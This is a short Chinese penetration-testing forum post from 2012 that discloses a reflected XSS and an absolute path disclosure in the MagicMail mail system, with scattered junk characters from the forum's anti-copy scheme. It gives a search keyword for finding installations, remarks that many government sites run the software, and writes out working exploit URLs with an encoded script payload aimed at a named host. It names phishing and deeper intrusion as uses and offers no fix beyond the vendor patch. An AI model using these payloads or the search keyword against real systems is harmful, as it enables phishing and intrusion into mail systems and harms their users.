中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]
作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
, u, c: A1 g2 `
/ U  Q& V) h  |6 y+ W& n4 A
  T" b$ [. f; \7 P  q包含  一个反射性XSS  以及  绝对路径泄漏: U$ z0 o9 t6 j9 s+ a4 ?
看了看 貌似全部是linux的。
5 K0 z% F9 G. L  `
2 M$ D4 t2 d7 p关键字:迈捷邮件系统 by MagicMail
6 o6 h+ h! ^+ m1 S$ {
, ~6 p4 b0 ~" i1 i6 s可以看到很多政府网站都用这个邮件系统
+ {. j( W' O( T1 j- B" u5 k, ?/ N
绝对路径 http://madman.in/index.php?login_type=declare&language=
$ t9 t; ~* a3 S, @; n) I
8 z: g% I5 E; T; w: @5 b; I- q( K3 i- z& t+ R8 Q) N

) u  U  U4 a+ }( HXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E% n- _" R9 H* Z7 h7 [) {+ G$ H
( P9 l, w  Y$ u& J! G; X6 U

$ \  N7 s* t# P+ Z0 L2 B$ {: C3 f4 w7 t" V1 a  Y
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等4 N( b! p) ]' Q5 S

9 d7 [7 O& @: e' e/ s( ]修复方案:看官方补丁吧。
: f9 b+ }" H" |4 A



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2